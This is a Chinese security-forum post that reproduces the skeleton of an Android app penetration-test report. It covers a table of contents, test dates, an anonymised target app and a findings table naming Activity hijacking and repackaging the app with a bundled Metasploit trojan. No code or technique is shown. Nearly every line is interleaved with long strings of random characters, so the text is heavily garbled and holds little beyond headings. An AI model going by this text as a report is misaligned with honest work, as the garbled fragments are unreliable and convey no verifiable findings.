找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4070|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
' w& T+ i9 C0 ^& N e * x. f& }' ^7 s" ~# H

! G, Q1 e; \% @* Z- D% ?/ @8 l ' Y0 s1 h" s' u$ \
8 D% Q4 k' H% x f4 B# l9 \ + [. `; q: ^* N* Z( P9 G

) v4 o/ M* p8 h7 k0 t " `5 i. m. U& g5 Q* {# P
% X/ |/ Y7 I: o3 ]& d" u) z/ p$ \$ f- f" ~& m- C7 X K

4 W( l' f3 {% f, c& Q( h% D ^4 |1 H9 \0 l) S 文档编号:                : Q# N/ n8 r" M- } + f1 c, U+ C; z6 S: p1 X

& I0 C& J. Y$ A, m1 d2 F$ O4 o l. h& y+ T C2 Y j; s

$ R$ [9 f* k) {9 V: H+ c9 y ; @- z2 ^+ J) ~. O* X) M   / R: b) D; a" L, y/ x' S% ~6 Y# p3 W, R7 M; W9 |) j( V

. L a8 U# \4 z" d5 N# Q! y, z; e1 D/ d* L

7 R) M/ d$ X4 F& r/ b+ O 0 z/ n* G: y& U l   # H# Y. E. c; ~' h4 G. Z) y8 K 7 T: `4 v+ t2 U5 b

4 m/ D5 e# r* Q5 d/ q1 R: X1 X4 R# Q! v x$ Y

0 K F$ v8 Q% @ 9 E4 U, U% ^& h1 J H+ p1 u; s   3 i; J' h1 p1 X, u, Y3 t4 W8 P& l, `; V% @9 I

; {0 [/ H# X1 t( S ) [2 C, P6 k8 F! W1 H( X

. ~' \, m3 f* T( \, H& }+ [/ W 5 t* x! y& ^. V+ t* U0 u" R& k# B   9 s4 O% {, ?/ {9 W- _ 7 D: o% `1 A5 u& {' g

" O* T; V# Z+ `' G* V' D( W ( r) X8 y+ E; C- ~, e

8 L0 ]& Q. P( s: d ; Y" Q+ M& M) U$ w   $ C( O$ | K0 G# a" w; J8 i t& A/ U0 ?. P6 S* l" |

1 P+ ~, H3 J; J- Z R ! a- T" W! u- r0 l& M/ x( M0 ~0 M

4 { }7 i2 Q( }! j. c ; h* k. |. H: M+ P 某某某APP渗透测试 9 y2 E+ I* F, _, S- O. ^0 @1 a 3 B* R( u9 D7 K

. U+ K4 l* t2 j4 i1 G2 e% C& c, J, r2 ~

g/ l# _4 ?- v* c" a& f3 ~, S4 B5 B& M/ {: e: K7 U: w' i X   0 s. `2 k$ u8 k! w+ @7 p8 A* ]' ~ 3 }2 N% V/ o( d

( B7 q6 W# r& W3 S5 i/ F 3 n' J/ P# l* L- Z7 A" E

X7 w6 f q8 N% k* e " G- z* _0 l+ H0 R* F% G2 ?   8 g0 _* i' t" x! K4 E; z7 _ 0 L* c- O y& g0 `; I4 \

; m2 [3 h" w$ G/ x/ {) {3 t: Z: y0 n1 |& R) q' L+ g

5 q7 C- l, C9 Z9 X& A( {, }5 ?9 |3 D; h& L! c8 x; r   ! i, C9 u( S0 P( A 9 u6 K' R8 `9 i+ ?; q" [

- o: z J# f# t C- _ 5 k2 R) E3 g+ V

- I$ R0 X- T( E; K; X- S9 D1 [9 e   * ^4 r4 [8 c: r6 v3 H ; `; S. ?! M$ O

: s j) v% Z: y8 j2 a 8 I+ L4 r1 w( p- N

9 s& e1 e: ^5 g+ e 4 }, M, o0 A4 ~0 E$ {3 _) |/ @ 技 术 报 告 8 A+ z5 P! U# `$ c # c. J, W: M$ d3 [' `2 R

# G$ Z3 y, O2 l * G, w1 \" C M( j2 G

" p4 O; T3 z0 c# V% g+ b ' I5 ~& N7 z* m" {6 _; k1 L! i   # S5 A0 d8 V$ D. Q 5 t- ]% P1 X: U) C& S' T

/ Y1 S* H( M4 H% p# T 5 y* ?1 y3 s7 i( T/ ^

( l0 n/ L3 {, X6 S0 L; K. u: g: w/ P3 T" E: s2 ]7 T   ) O- J- b8 e' y) Q8 C. m: L" p $ _% t: d( y; n

6 p! H, J h2 c& B7 O! A( X" Z2 @& L }

, M- s' a' Y1 C1 `# E" h3 `* ]2 q. U9 X1 g7 [+ U& I. C   . W1 Q9 r/ k+ d: O' U- H5 n Z : D0 N5 d2 N/ s, k2 ?

4 i7 {2 w7 Z/ y; o- W/ [: U* q1 Q5 w$ N, A# `

' b1 E0 ~* I0 M5 e# M+ h* M i( l) P i1 V! w4 u( D   * A: Q2 { N5 [6 { ` * u6 W5 I0 G8 w7 ], E8 x( c

' y w$ K& V$ V7 e8 v$ s, p/ F# A/ `! o5 V# p& i( S0 i

. N% i6 J7 J) i, H/ X, j % c V1 A A% Y# N7 j9 r4 f, E   & J0 }! s, ~: O- T K$ M 4 N' Z) M- |1 \# ^3 Q9 U

- g$ I" Z# O3 w% d4 Y 8 w, |7 A3 [# O" ^! o

" d5 N& _- i" @! [+ H1 j' Q m 5 R2 f) a+ L: I) R$ ]   ' r* i3 o; k2 I8 `1 x2 U7 R( }6 R , P. V7 A2 `9 z0 P' M6 R

; e- _/ ~% P+ g) I& @: R 9 q1 R& r' o, t: C2 H

6 R( K! s$ |& `% T% _: p, e : I5 ~5 r; b" p: D" H8 g" A3 B% k5 y   8 R. Y J8 c- E! n4 X5 N" v / b$ Z0 b6 Q9 Y4 X$ V+ H& r' p

7 B ?7 { |# T5 s! D, L9 F& O* z, O9 O5 [$ E, A/ |

) B! \' l/ v. m! G9 B3 F% c 7 j, }3 P/ H+ y! b- K   3 v# v) V" l9 B3 W: X" l 6 @" m! g& {/ Y [2 K5 x

: Q+ H6 C+ h2 c9 { % p" i2 f9 y- u2 q) L% ?# T) I9 N3 d

$ @8 d, ~# v6 U: \4 ~ 1 @( M, p7 L* m% p   3 v' _" [" ?" Z. Z & t6 c9 Q* ?. H+ Q

( w0 `1 t8 R- l1 X! g) i" e0 G. v, B % x! Z1 x1 p) d# |

# S6 `: i$ x# `' P9 S+ ^9 W" j/ ~( d* m* U }2 ]: U4 w o3 [   1 F9 n9 x$ M4 }' f " q8 U# k9 i5 H, d" `

: U6 @( _) N& O+ R 1 t& s! g% a% G

- A5 L4 ?9 _) q& _ n* X 0 |+ h* h6 a# d/ @" n   ! ^+ b6 R7 j5 ~# O* S & f- j1 u) @( Z" a; b

" H! K2 y- J2 w, V( ^ ( n! b. S. b( b3 j2 G# |

/ R$ y( N$ {, N; S 8 a+ K% c/ S' k8 ^4 E, H   - m2 ~3 L" x5 v+ D5 I8 w5 u" o2 l2 S" [' m ! c; I; V' V2 G& Q4 n$ K6 m

( z3 Z3 L6 i0 s, L7 k / G+ F( l5 x: E) h1 Q- ~, |# {5 Z

. S" }' M! f* [$ u! f 0 E) O* }2 e8 G$ a7 D, W   ! ]/ ]$ b- \# r+ @ P- c' f4 w 8 v2 M7 X( d: j" g

8 Z/ C( }; w% ]2 G0 j+ c+ Z ; e, p% W- P/ J& v$ H1 v% X

7 X1 V. ?% g4 H9 a+ I' E0 z . G2 { D* N. a* f   & s" _* f& [; d5 u 5 G; R/ a9 W. L1 d1 E

8 H8 x4 O# P; m# B$ X4 l. T: l* y3 p5 [& [9 }' \( C

0 A# C( J" _8 u " R, P+ |8 b6 o+ k1 s" N. ?   ; k z/ |7 g; e( a) S% k3 |3 k) [; j5 Y& S4 T6 b

; g% c0 N$ x8 r& Z # J4 d2 W- k9 L v

; q- I+ u; b( j* p6 X * T, e9 O' {8 {' U! ^8 v   . |' k* O$ b4 q 9 y" N- F! G$ ]4 [3 K& Y

& f ^0 I2 F2 C * q7 d$ P3 B8 u) d

8 N% K) U# [5 h7 E - ^* k% B2 ?0 n; g/ t! G   5 O" e) O, m8 p% r ' `0 H; n9 I3 N4 v6 o3 G

. ?6 C$ L$ n: _4 k " u: b; |: ?1 V7 u7 s. f

7 G' @" k5 @# o3 J3 [; E # T9 `& C% R4 H1 m$ e k7 i" Z6 H* P   9 j* [4 m3 g/ Q: m; c5 a0 B. D m

+ L, F; a. `! V ) m a& n8 ~2 h$ e

$ ]9 _2 t5 h2 a8 t! @0 h# @. _: F" G# o8 `. v0 c# P9 z 二〇二〇年 - { e( M0 s i: x5 J0 V. E4 E3 I( J* Y

% ^, Q9 `+ k3 {# R a" b0 B/ P" w6 L 1 g: }* @ x% s$ J6 y1 G" H
; s' z" V8 L" k" x! X7 J2 B% n% d7 c5 K' T
$ Z5 ] e& B3 {" v % E1 _- m# S1 n" K8 A' n2 \ + v3 \! z# S$ y/ u4 i; _" ]; [* A& b ! j- o' ^4 c: E/ R+ v7 B1 V( D
7 H' U7 J5 ^0 Y1 z& F 5 K: H& J$ ^* c1 j f) u
/ ^& i/ ~7 T1 h) _8 A& a8 d # s1 W+ U* F0 H2 h/ s, b
; l" ?4 y! ^( |- W# e; {* r& f2 ?$ T# |+ e* C w 1 M' x, n, W, [+ J) s* y+ r * M4 j8 X9 d; T E9 t
" R' k' {3 n; _6 }6 N. W ( \4 L- a3 w- d3 R6 V4 ?

4 c g! R1 y2 a; \/ m2 u0 Q7 M* S / ?: Z& F& U* g4 G8 ~) A( g 目 录 0 G9 I9 C; y0 _4 k* h8 S/ @: O 4 e& }; F: T9 F1 v) H7 s

8 f0 f2 V' Q$ I6 Q' w, [& g9 Q$ D$ h. m! Y) l" Z - p& E9 a) I3 ^# x L3 | / q w! `3 P1 P3 v6 F% [7 s$ A

% N% W5 {. d/ r3 I; V0 k* k5 c# W9 j0 r5 s3 z   : W1 L8 r M+ L; `$ [8 m , P: I" L* u3 T0 j; _$ d3 P

: U. H# r* }8 a! n/ f9 I& d% N' m+ a & x8 `% [/ X5 [" |6 Z' \0 S

4 I+ I: l1 Q% y, c) ` n * H/ w0 ]6 F# j 1 概述... 3 7 } o5 e9 G; I3 W: w( { + Q$ ?0 Q' C. C+ I0 [5 O$ q" s

7 U- Q' ]3 t4 H5 V. p7 C / E$ e& J8 K. D3 D. I8 ?

4 w" I. \- W+ H. _% u6 ~ ! U. d2 S+ Q6 I: F8 ~ 1.2测试时间... 3 " v3 H9 @+ R( d6 b5 Q 2 ^. g/ z( Z8 b6 b

& F% U# }- V9 w2 l9 E; O 2 ^" R! M n7 f e

% M" d7 w4 J' O) Q6 ~- }# ? ! ?$ i6 w6 F! f, L 1.3测试对象... 3 7 P' H- A+ P9 S" P7 I3 o) T% E! N! \$ l L* k$ @7 _

}- O5 g- l2 {7 f - _2 t ]- ^, O8 T8 y

) J) S6 u7 p9 A" u # @1 U- S5 s; J5 ]. z9 a& N9 ?: e 1.4测试结果... 3 - |2 l5 f( U4 u- {% P; n8 }8 _9 m2 d+ ?! Z# F

' c! D8 u3 l8 K) r & }( P ?, V( L; _

9 X! r4 c& n: o. P$ G4 Z: A& M4 z# R& W( `) k; Q) q 2 检测结果... 4 3 c9 J- ^, I% w; |7 f' Q$ | ; u2 P( v& D" _( }: r* b7 t8 n

& o( Q# O; N( q! _ # V ^, u% N9 y9 r( _5 ]

$ z. |" J$ u( H g% n' Q & o+ O6 h1 o6 q- W/ p 2.1 某某某... 4 ! S/ Z w, N& q* `6 b" D A) Y4 k3 e2 C, k' R

' R$ Q4 V9 ]2 ^" A! s9 m 0 x) n$ F8 ^$ y/ x0 d1 Z

8 V7 r P( D8 p 5 K) U5 p7 X8 k5 ~% i, u" c3 W 2.1.1检测目标... 4 ( ]7 ~% Z7 z3 {8 J% q+ @; I* d1 m8 ^0 Y% Q

! R0 \% `; u) O, S7 I4 z8 X+ h/ {% }5 @" u% t: U

- j" T8 P9 [4 R' a2 U3 X/ ]6 B : h! s u% l5 r6 H7 Q' Y8 R 2.1.2检测结果... 4 6 D2 ~6 }2 [4 k8 k& t, L5 K4 g2 Q7 w, ?4 \. X9 i& l

6 X. k3 J! o- s- e B8 }- C % Y8 k* ^! K0 {0 n

+ Q% @; T" n- j( C- | . @5 i& ^- X8 [) a j5 D1 X 2.1.2.1. 4 ; V9 @5 W% O+ b ; M0 q# ] t9 o/ M& D

, v+ h, ~+ l% u3 F- N8 s / k# o" _. Y+ Q' t2 z! P w5 F

+ h( a9 b# Q) p4 k! Q* e9 O, ~( ^4 p4 p7 ]* u1 O, v- M. T% O4 N& } 2.1.2.2. 6 $ i* j" U5 X. u ; m4 j9 n, X# a

) O5 _( ]# Q; \( k/ h5 R6 z9 {+ i* N6 t& n3 y$ j6 T

/ k& ?; O* U5 u ; v6 N% Z( _9 h8 w7 T2 p " Q: V7 ~3 E3 m) Q6 t4 I: v $ F# [" x' m/ |! K9 L3 S Q

& d/ I S! s" X( A7 i8 q1 n . p5 @$ X) Z7 B) e+ q! b5 |$ n) G; `1 K- _ - z1 q. u0 z/ T! ]. n" f% K
/ v. ]+ k, a! h3 E! h8 u" R # V# H# |- A3 `5 `+ y) Z
$ V9 n8 G/ C' X* [( r / O/ w J- c. o 1 e \' \2 s' }4 x. W B; s7 ?! e$ P

' i7 n4 U) H" N# ]) W7 t3 w; v+ n1 b% G 7 A" ]: t( B6 o4 |1 Q 1 概述 ; F U I2 b4 I5 a( _ / l/ s" D7 E0 v

1 P/ o& O3 ]7 ~7 b; t0 m0 R . z( w! ?8 j, }# E/ m: H$ y

5 ^2 Q9 Q7 P/ X( O3 H: H3 @4 N7 k, R6 _6 s& A! L, o 1.2测试时间 * `$ d( h5 O3 k5 o; f2 @$ E' { E# g; m# t

4 c( c# I& D. c, `/ N9 r: P' Q$ _; i( \ 8 T+ @, V7 A; o6 @0 N `' f ) T. Y' } G2 H: r0 y0 m2 T9 z( h8 o% Z! V7 i6 n, @& F4 T% [: h% f, r& o2 H7 L) f, W, X, q! ], Q+ x* D: {$ b+ C. g4 C# m D( w0 d& A; s, r' b( g( O! m' T5 i6 p5 p M7 h- N; `3 E4 B0 `- j0 ]: l; C& v9 ?3 ?% } W# ^. W u4 ^/ s5 o# D% F( }8 M7 e( f, E' l3 r# I2 ]0 V7 c, l2 y' ^$ n7 `9 `% Q! K* L# A" R1 X2 D+ V9 A k9 X* {& ?2 ]% ^ G& U' s+ p1 M/ I. M* v0 T' ?/ L! b, P+ p! A5 @+ t8 d* g. P, ?. L0 i9 g K& K# ]9 o8 l& L- v- @ j5 x+ ~7 p& M7 e7 K$ R% X1 v1 i8 V; i6 ^- M5 l) U9 x0 g% P2 B4 f$ p5 G Q2 I& l9 |$ K: G6 h! l/ p- a- u; I" u# c( X6 e# I6 w4 k8 A+ Z U$ U8 i7 d4 b( G: B1 ^' [9 l: p4 _2 J0 y* P+ p) j& Y4 `! g9 n( @3 ?' o( j% n( v9 g% u2 j7 |; s
* I9 Z" ?+ b# m. _9 R8 c4 G! s5 b ; P' Z- j7 H( f

4 d$ N/ v* F$ `) D# Z) E + J9 `$ T4 r! O) _; {# n4 } 渗透测试时间 7 U4 X" h( R( S, I* p( k3 w6 |6 g m$ W( ~$ M9 e3 v

* [1 T. u) H$ g0 f* ^7 p$ j$ y% F1 Q ( O8 C0 K9 U+ H: a8 s* ?
6 L( L* V3 @) Z0 M: D1 X ! W0 {7 Y9 ]2 Z) L

7 C, a9 x# Q! x' V & ?: v! i! V8 h/ O4 N2 g 起始时间 ; E9 V# \! Z" _$ } 8 |6 ^1 ~" J) z$ B7 a* i

; N! F5 r. R( G# u P. W $ ?. l) Y1 {* @: y 		* x4 V" O7 H8 x# r; @5 F( ] ' Q1 ^" M4 }/ Q5 T" X- x5 r% x

6 g$ n2 B8 J2 a# g+ {& x ( f3 m6 ` {+ N% r$ W, d* J 202046 6 o7 A7 @; ?/ y6 r9 s; j" j' J L1 ~- `' d4 y$ q

1 C% u3 \" k3 z: ^* z + S+ D, U6 p/ W3 K d5 \6 b A( p3 G" {
& G" M1 J2 f4 s5 H! Q * q0 n9 x+ z1 q1 C& F

* U( `. o* C7 e6 a; Y " n p7 v& k6 u4 _ @* {$ j6 d$ L3 K 结束时间 1 o5 e4 }4 A7 ]: |! l 8 }0 V7 R* t4 b# Z

0 x& ?2 ?& K& y& n- _0 O* q2 ` 0 v" E+ U3 L8 E* L$ C1 |) y 		% O3 A8 F/ W+ s [1 m' u 0 w9 E, D/ V7 u: a/ O9 l

6 n+ K8 H+ x9 Z* i4 r4 y 0 d% @, @" l1 V1 ~8 W& @. ~ 202049 1 P6 `& N" `* s) T, j1 }; w1 [, }0 W( m' y% q# p

5 c* r5 M& {6 {4 ~ 6 c4 a8 I4 n# r
7 ^4 Y" \' Q! L8 A, \2 G 1 p) H% ^! S6 S# W: q4 J

& M2 ^: F N+ E M2 q1 ?7 d 3 E* S+ z+ A; T' Y% g" W4 u9 M% ]. ` 1.3测试对象 _; A% z: _# Z3 F0 \6 J- V - R: _5 H& H' j! c* r" j8 g

$ p% U; A* X* `3 A5 O " J- z# V0 x' G* Z0 V1 J

3 o8 L% ]" k7 B5 E& m2 ] & y1 F: l) p8 ^ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: * \9 y1 ?) d; X/ v3 _2 {& i % ?" T3 D# t" K5 r+ M, b2 n' }

- P6 H7 X# y5 X0 Y* l6 m- ^ l Z7 o& z% h( H6 i: D3 }

, X3 }! F5 u, u# e , P Q7 S1 i& V, A; j6 K: O: E 1-1 检测对象 + ^0 Q2 M* q4 m 9 Q* V- g% [3 V( j3 D

, F4 b1 S E1 o4 _$ d% k6 h$ v * y5 q" e7 @4 _% S/ ~ ) c& j g4 _, ]! H. \! p+ C& D8 ]: n0 L2 @3 F# R o# u% Y# V- @8 h8 `9 l' y) o1 [9 x# k- E5 K5 n" ?8 G) M3 U3 W% `" E/ h. D' j+ F- z8 ~3 D0 C4 K* c0 q8 I9 ^1 p& q9 z( Y/ Q! s0 t/ F0 _! Z8 P9 G) @( Y0 S0 j9 _# U* v; }( K2 @1 D5 F& c* u( {; O* D7 R3 H3 C1 M8 S, b0 @' Q: }4 A* v' M% n# L7 C1 K7 ^# x6 e4 B# L A$ ?7 ]" L4 t) K5 ~: v9 k5 V; \: ~! [' \$ Z7 i6 V% \2 q/ ~% e }: n( O% S4 r3 B6 K8 s# B( [5 X; ?/ @7 C* c9 b( n' q6 d& w" M, p" N, |0 g) f4 q/ S! r& Z) d2 L4 P. g( t* a: p, r6 L3 K$ E% J. @: ?* H/ F' P1 j7 o M) U, B. h* q2 }( k8 {9 X" y' U' [7 A( ]7 g" C: m$ z+ @9 q$ M. \, m6 z0 V# E4 X( L1 j- `2 g, H1 n: Q0 ]; _2 s# ?3 ~) L/ ~0 J" B, U* d8 @1 |- n$ o l. R
' L T& G/ a* t' O6 n 5 M0 }6 B, f$ k, _

. z r) v/ T+ g: _* n1 A ' W. x0 J7 X0 _; p, j. \) u 序号 / w% D- D: _' N3 P9 J2 ^% C$ V 1 @6 U, M1 l% o4 [+ `

4 c& ^8 G6 ?6 B/ c7 X' s: P & E* \2 L1 l4 y" V) X& ^& g f 		1 m8 p& t- j7 g9 t4 P& n9 ^' w, R) P; A

% N: O; w! w' H1 ~7 B& v8 ?1 m2 D" D* U$ W 测试对象 4 H& M" s( \* z, c* W1 A - i6 X( d8 T; \( @( z+ c% D

7 }9 R2 p4 L o' K1 {7 R - X6 n* Y, g. X! `% W 		4 x' _0 T5 H# D G( V, E4 p0 a3 b3 n" [/ C, G% [+ w* F/ @

5 ?% T Q2 c5 X/ _' ^5 C1 ~: k: X$ M! f+ u 测试地址 ( G/ E' w \5 o& |# u9 ~ ( H" F; T1 q* X

* N8 Z6 S: ]8 L+ B/ C& g+ k y# {9 g( L/ s1 D5 ?3 O. E* A, [. ^ 		1 g) {" v9 f3 A0 X , {5 i" U, \2 W( s4 o! I1 t

( p* l4 {: _6 p$ r 6 L. E+ q2 D: p- `, C( O" j+ }- K 安全漏洞 $ G/ ?) c' A8 ]- y6 d 5 h- U Y1 }) r5 Y- n6 s+ D5 }

' t4 H$ P- p. V e # |0 Q' Q8 [1 k, J+ i9 o2 u
: _, v& T% {7 g9 {8 e+ @5 x ' C C4 Y( ^3 s8 c7 t& \

0 n" u/ V2 Q/ I % Z0 o' M y: t5 P# Y 1 4 L4 N7 f1 J5 C , [" U C; ^& b7 _. d5 x

+ f6 l5 t" e: L; _ * ]" X& c3 }% T! a9 e 		$ V$ ]$ f; r! T . A9 u1 j% t2 W' ]$ a

$ B# G' m! O! R; y1 c ) T9 t: q* H+ h) J8 i 某某某安卓APP ; a( @! c. w5 Z/ f' ?' ^1 e! c4 ] 8 A& s: H( t2 k

% N* f5 i0 u; I- X3 ~( z8 Q: P 0 t3 r0 Y" r% a: B& ? 		" `2 W- ]( |2 V3 d( J2 G9 a9 R$ T" K! A3 R

" H& S& o2 L& F# \& r6 L7 Z( `% F5 N2 R. c1 m! @* S   . R* K( `. S( N3 F1 a2 X F) ]8 V! A( N( ] p1 k* e# M

/ O( I w! F) v( T % l( x' \- I1 y+ l7 X, F 		# e& d9 m- V8 o4 e - y7 ?5 ?8 j% { I4 O3 a

3 R& \& q8 ~# @" d ! H, n7 z# ~" d 2 : G6 x* J) ]7 l 4 p2 b" F" A' | m8 P! `* ?

; F8 t, `7 t2 \& M% S9 X7 J. { , ?4 ~# P1 e4 D& S& L
4 }( f7 G" \- E$ H1 ^ ; Q% c; Z# U; j7 ~

6 K7 F* X2 y: b 3 X) s1 K1 I1 s" ?* X! v3 m 1.4测试结果 9 u( l- X6 X: U- t9 f0 Q 3 o7 m& p6 [" _1 K& ?

! K* t) |& Z( e1 Q ( `/ X$ z" Q# M# t

1 I$ U" G' S, e' \) n* N+ B 2 P; ^6 k% c+ S, c 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: % t2 ~( P# K% Z% c1 L2 B' J' l " E5 j/ w8 H! a t

0 _# ^$ p, _3 V$ ?. T% E1 u ; n# C4 p X/ ]7 K$ n3 M/ d

& t! ] E1 y& t" Y% X; \ ; G- X7 d# d! G5 b$ i; C   1 f3 v( t" `2 i3 n2 W% [" m * T2 [+ l- l( x3 s" f, L. Z" E

" Q6 I e/ O! @* ^2 [- I5 ^& Z9 Z " h! G* a9 @$ N6 |" Z
0 g6 e0 L/ p; D3 y: E& p" Y9 ~' c$ ~: i" d1 _6 V 4 E4 _5 s# x& q; V4 t$ t2 N6 I3 Y+ y( f8 m) |! v" V/ N s3 v5 y0 {9 P+ h4 b3 g% j9 l2 W$ s" A" V$ R: V) J; d! V3 S8 o& `2 R) W& F9 J: e, \& Z6 N8 M2 v2 o8 v4 a% }; M" x1 P$ J$ m! T8 c& v2 a$ H6 ^0 R) \* p7 i4 N% h, r, }0 [$ l4 K' Q* B" o+ v; F0 D0 Q5 F9 e# q/ @+ M7 } }3 [3 q, A7 o4 ?: E; r& G4 w$ m! w4 Q- i1 C8 }" U: M6 n0 \. V8 N" @& ]9 d/ A) I" k3 t2 \. x( q+ _) [+ t: a; W' E: c: K$ S& S) x d4 _0 F9 X+ k9 Q5 r- J9 ]( V8 F w& ?7 i; l! {; D6 v4 y! \) h8 I3 j& _ ]& l$ a7 q6 w, ]" S m+ ?6 Y' y7 L1 N/ G4 A, O, ~6 c8 f' o) |2 |5 o' L. ^+ e# @8 S1 A! P& Y& A- R Y4 l0 X) p- l8 e+ f2 I" `2 |6 w; C) s$ _5 N [& ` }. M* f: v, B; r3 D0 ?! t( s9 E* Q" n! U3 ]$ M& s* b1 {8 C0 s' A2 i* s9 i& q j' e6 a8 w6 ?; Z: G, H1 T7 X" B7 t1 w7 T# `$ E' T4 T/ t0 Z$ v, X$ A% ^6 x: W G# J0 }/ P0 @* P* n @7 B2 I# q6 |% v+ x7 w7 ^ S' b$ G/ b/ h# B1 ^1 ` t- |5 C: s6 S$ z* t) g/ m% n. H( L0 i6 z0 U3 M# B# Y, N" m- \ t1 F# E& @. Y' s4 S6 g. c# \) P* \ X C* r" L0 C7 |% S" S/ X$ X, v6 D: z9 e9 f2 h' \& l* k S) J& K- N; f. ~: s9 i3 p' F! P' L. X/ ^$ j* g) T& Z, g, x5 s5 [5 B! \; H3 a. W0 F3 X1 Y- u; g$ d! N1 P8 _/ {1 X7 q5 i( ?, W: c+ i$ i. |$ ^; ?# X
3 B' \: [! T6 O6 ^! C" i/ [+ w1 f( }

1 I" c$ G. m/ t, q3 J( h) j ; } D4 V" `7 @0 d9 Y$ o" m6 w 序号 - v. `7 `0 I- A# n8 C $ W1 T1 \" F1 n; j& y2 }9 q

( ~6 O; y- G: b# m # ]0 H4 S' ?* a2 h; N& u3 O 		1 S% ~% H: ?# ]2 P " h h# y4 `" }. b

6 z. l/ g' L( L- t4 o" a+ | + u2 n$ Q1 k! T; E/ X 系统名称 # B* Y7 b- f6 V9 g G; W 1 f3 x/ j" {5 R/ x \

9 y) b2 W! V) f/ j& {5 C5 l2 C( f# ]& p" b( E 		B# e" r* i4 w2 R7 t! G9 q8 e7 h; I

5 X6 D& z: m/ J3 u* Y' a" }7 u ' G/ n8 Y$ f) z" m5 W6 S) m) h: _! [ 漏洞名称 4 n4 e. H0 f: M# h z D3 f. s. W/ D8 s5 p5 C

" {! A. v6 s( P% o: q) y* F- V- m( _ H/ f4 k7 \3 _4 g/ X 		& \* I9 e. W( `' N( \. ?# U: w, I! f: X( e5 u6 W

+ T: L% ^: y$ u # }5 b$ `" C1 W6 O! N 漏洞危害 - t% D. X' m' r0 O! D$ Z7 f7 x8 o7 x) A) X

0 E& i3 y8 [3 i2 Q 5 k, T4 [$ N8 Q+ v3 G k 		. v$ t( f$ o+ H* F1 n7 t5 H& J2 c4 s2 D, R r; b

9 [3 g U8 h' X2 U ~0 c - p0 L$ b% `! D0 T5 Z, { 修复结果 # @& J$ R# @7 b; ~ 0 |7 {% h' s4 S" N' X" O# i( r

' ^2 T9 H/ |, `7 `' t e% ` $ h# @1 ^; z) I( R7 D' E. O
3 W( ~4 L4 O4 x- L: w 2 N) w, ?/ ]. A9 K5 j' n) z

0 ^7 a' z: r4 Q! h 0 D l7 O" N6 `$ @" m 1 : `' x1 h$ l: d6 Z* Y) _: o. F 3 M! K) n. \% N4 E

8 d+ t! E- P+ { 8 r0 S. B; S4 L" {4 n5 c 		: l" d! g- ]' q, z 6 ^0 a \4 j: z9 P2 [

, H3 Y* ^1 }" E4 a3 V ' e0 C9 l" n0 p3 a; ^ 某某某某某某APP % Y1 \; y4 |7 a4 q! ^3 Q3 K/ W; M. V# c( k3 L- V l

* Z3 F3 ^1 g$ ?: m ' Q$ B+ r$ x# J% x 		2 k9 z% S% A0 t5 d; Y% J9 X! [/ H * r) f0 c/ p3 H( u

8 Z2 }$ j3 l+ k+ r$ K: L: _1 A7 F9 ~& ^0 U7 `7 w& @ Activity 劫持 - z( {' A1 |5 P. I, t3 v3 B; X; J! G& [/ q$ `! \5 S3 n7 w Q

, \6 W! I5 M; d . ?* s6 y, [# t. L6 J

5 ?/ s' S+ u+ a I * f; O2 ~5 A0 M4 ?1 {# b" t& y   / ` B4 \4 H6 t9 D r . E7 w+ C& _9 t1 h6 y' y3 E

3 X4 C. q# g9 Z. ^ ' l# U2 F5 p5 j$ h! Q0 t/ | 		$ p" S* L' q3 J9 [/ q 2 N/ C2 d' ?7 i* E* R# O& y4 k

+ Y0 u0 h4 T+ p. c. ] c! O# m& M6 _; d! S3 k# n8 W1 I/ Z 4 y. C. g2 H* M* w1 m- ] ; X9 T& ?6 p# t/ N" i

. H8 c1 l9 B9 e6 ]5 T3 c- c1 J: S" z/ M1 \- y' s; `) } 		% d+ v4 n" x1 J/ A2 S/ v6 D0 u 1 [" Y( [# M+ L9 x' p

8 Z$ m5 I* n8 [- U# } 3 b1 [9 u" l# Q3 M   $ O; F3 {. m% D 2 S L1 p' }7 X. p7 J2 I. O6 e

/ v# }% c# c% ?% C0 J/ N: D- }8 a " a8 d& _+ _. T$ |2 C; i
2 i" M5 M& O: z) y: K# J6 m5 d! H4 f) S; k

1 [' n! S5 N/ U) `- V 8 I: ^- `2 T1 ?( D% R6 }* n" l 2 ! a0 t& O7 A- K0 f # l( ?+ s8 y* r/ _- d8 n

* Y4 y4 ]: \: V( X& u! f2 G. t& E: T2 t( t9 I 		b; ]. Z& _* E: x: w7 L* l ; F) E" @9 \# \$ Q$ X

1 {# [" |7 T; [6 X! P) R7 }. J& Y4 e' N h7 D: ]1 x 某某某某某某APP , R8 m @! F' O- ^4 W L" K0 w& T, I! Y: K4 J0 }0 Q

& |# c6 R$ k8 j1 c & {8 R9 y, g# i1 Z3 R 		+ ?8 s) k' _1 S+ ]+ v! A1 O % a' d& |+ E/ A& b7 w% r8 Z

( f/ Z$ H% o8 G7 t & g* _# Y" n# e9 K 反编译二次打包捆绑木马、篡改APP代码 ; v6 f9 J+ j( P+ i" s; | 2 D8 J0 @& a8 k; P/ _- A4 Y+ n

7 z8 ]* a/ }- K) [ 4 }& W: |8 g. b* _* o( U 		) b: u) ]4 O, e+ ^+ Y ( G4 e+ A% R, q: M

: u( f( Y& P: _) `6 b; ]6 K/ I3 j, I/ x / P( r& G% L# Y( Z$ n& q3 _. x ) W, i; m2 z" L4 x

8 z, `1 k1 a: Q5 H# ^ 8 b# y$ a; U% p$ B& f: g 		/ U% Z' T4 W/ o 6 Y7 _" r9 \ ]8 ?

! g( x6 Z8 a; P( Y, U$ M& v$ a/ U   ' E8 e- m! W0 t* y" X6 Y a ; c. x& i0 B7 O& E9 i4 e0 F. ]% c

! m- Q/ a' c; R4 k! C7 T# r; g$ p% c+ V: Y( t) @3 m
8 \7 r1 X+ x3 i5 L: a. o, N3 K3 t% b1 V _; L
4 o9 g9 _8 {# k: v' H+ p& C" o, Y& Y9 V3 Y" T8 E! A

